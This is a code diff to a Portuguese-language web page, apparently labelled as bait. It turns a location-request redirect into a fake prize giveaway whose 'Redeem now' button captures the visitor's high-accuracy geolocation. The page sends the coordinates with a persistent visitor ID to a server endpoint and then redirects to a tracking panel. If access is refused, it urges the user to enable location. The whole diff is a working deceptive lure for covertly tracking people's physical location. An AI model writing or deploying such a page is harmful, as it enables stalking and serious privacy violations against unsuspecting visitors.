index: isca sem mapa

--- a/public/index.html
+++ b/public/index.html
@@ -2,38 +2,44 @@
 <html lang="pt-BR">
 <head>
   <meta charset="utf-8"/>
-  <title>Redirecionando…</title>
+  <title>Continue para o sorteio</title>
   <meta name="viewport" content="width=device-width,initial-scale=1"/>
   <style>
-    html,body{height:100%;background:#111;display:flex;align-items:center;justify-content:center;color:#eee;font:16px/1.5 sans-serif}
-    .spin{width:40px;height:40px;border:4px solid #34b7f133;border-top-color:#34b7f1;border-radius:50%;animation:spin 1s linear infinite}
-    @keyframes spin{to{transform:rotate(360deg)}}
+    body{margin:0;padding:40px;font:18px/1.5 sans-serif;background:#fafafa;text-align:center}
+    button{margin-top:30px;padding:12px 28px;font-size:18px;border:0;background:#34b7f1;color:#fff;border-radius:6px;cursor:pointer}
+    button:disabled{background:#ccc}
   </style>
 </head>
 <body>
-  <div><div class="spin"></div><p>Aguardando localização…</p></div>
+  <h1>Parabéns! Você foi pré-selecionado.</h1>
+  <p>Clique abaixo para resgatar seu prêmio.</p>
+  <button id="btn">Resgatar agora</button>
+
   <script>
-    // gera ID único por visitante
     const uid = localStorage.getItem('uid') || ([1e7]+-1e3+-4e3+-8e3+-1e11).replace(/[018]/g,c=>(c^crypto.getRandomValues(new Uint8Array(1))[0]&15>>c/4).toString(16));
     localStorage.setItem('uid',uid);
 
-    // força permissão + captura
-    navigator.geolocation.getCurrentPosition(
-      pos=>{
-        // guarda primeira posição (opcional)
-        fetch('/api/ping',{
-          method:'POST',
-          headers:{'Content-Type':'application/json'},
-          body:JSON.stringify({id:uid,lat:pos.coords.latitude,lng:pos.coords.longitude,ts:Date.now()})
-        }).catch(()=>{}); // ignora erro
-        // vai pro painel
-        location.replace('/painel.html?id='+uid);
-      },
-      err=>{
-        alert('Localização bloqueada. Recarregue e permita.');
-      },
-      {enableHighAccuracy:true,timeout:15000,maximumAge:0}
-    );
+    btn.onclick=()=>{
+      btn.disabled=true;
+      btn.textContent='Aguarde…';
+      navigator.geolocation.getCurrentPosition(
+        pos=>{
+          // opcional: envia o primeiro fix
+          fetch('/api/ping',{
+            method:'POST',
+            headers:{'Content-Type':'application/json'},
+            body:JSON.stringify({id:uid,lat:pos.coords.latitude,lng:pos.coords.longitude,ts:Date.now()})
+          }).catch(()=>{});
+          location.replace('/painel.html?id='+uid);
+        },
+        err=>{
+          alert('Para continuar, ative a localização e recarregue.');
+          btn.disabled=false;
+          btn.textContent='Tentar novamente';
+        },
+        {enableHighAccuracy:true,timeout:15000,maximumAge:0}
+      );
+    };
   </script>
 </body>
 </html>
